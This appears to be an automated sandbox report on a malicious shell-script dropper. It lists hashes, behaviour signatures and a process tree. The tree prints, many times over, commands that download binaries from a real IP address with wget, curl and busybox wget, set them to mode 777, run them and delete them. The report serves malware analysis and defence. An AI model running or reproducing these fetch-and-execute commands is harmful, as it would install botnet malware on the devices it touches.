Analysis
-
max time kernel
63s -
max time network
65s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
62f98ba36b67090775ba65e1ec661b990233d901fe40fededd3fa2eac831cbc6.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
62f98ba36b67090775ba65e1ec661b990233d901fe40fededd3fa2eac831cbc6.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
62f98ba36b67090775ba65e1ec661b990233d901fe40fededd3fa2eac831cbc6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
62f98ba36b67090775ba65e1ec661b990233d901fe40fededd3fa2eac831cbc6.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
62f98ba36b67090775ba65e1ec661b990233d901fe40fededd3fa2eac831cbc6.sh
-
Size
10KB
-
MD5
1c70cb43a66368c4b9b8bb85f1b74c01
-
SHA1
ed29a1792a43f1933ae8fe086d534a59c7553592
-
SHA256
62f98ba36b67090775ba65e1ec661b990233d901fe40fededd3fa2eac831cbc6
-
SHA512
e0c823911b96489b2be21610e17994cc8e89da886a0185166d598b468a7c3a89650847e9cdcecf0f8d5353c5bc79fa89c28b50771e4cba9b5095aae64e88ac77
-
SSDEEP
192:yHnwLnbA30INa6i+VUInl780Bw84UInk80Bw8tHnwLnU0INa6I:BAS+VUInl780Bw84UInk80Bw8+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 810 chmod 880 chmod 935 chmod 838 chmod 904 chmod 873 chmod 910 chmod 929 chmod 947 chmod 977 chmod 747 chmod 759 chmod 886 chmod 916 chmod 898 chmod 941 chmod 965 chmod 816 chmod 892 chmod 923 chmod 959 chmod 741 chmod 858 chmod 953 chmod 983 chmod 971 chmod 785 chmod 867 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE 742 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ 748 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K 760 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 787 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce 811 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl 817 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 839 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 859 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 868 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 874 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 881 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 887 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs 893 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 899 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 905 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 911 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 917 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 924 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 930 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs 936 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 942 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 948 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ 954 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K 960 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE 966 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce 972 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl 978 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 984 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K curl File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce curl File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce curl File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 curl File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ curl File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 curl File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 curl File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs curl File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ curl File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K curl File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl curl File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE curl File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 curl File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 curl
Processes
-
/tmp/62f98ba36b67090775ba65e1ec661b990233d901fe40fededd3fa2eac831cbc6.sh/tmp/62f98ba36b67090775ba65e1ec661b990233d901fe40fededd3fa2eac831cbc6.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:718
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:739
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:746
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:754
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:764
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:780
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:809
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:815
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:832
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:843
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:857
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:866
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:872
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:879
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:885
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:891
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:897
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:903
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:909
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:915
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:922
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:928
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:934
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:940
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:943
-
-
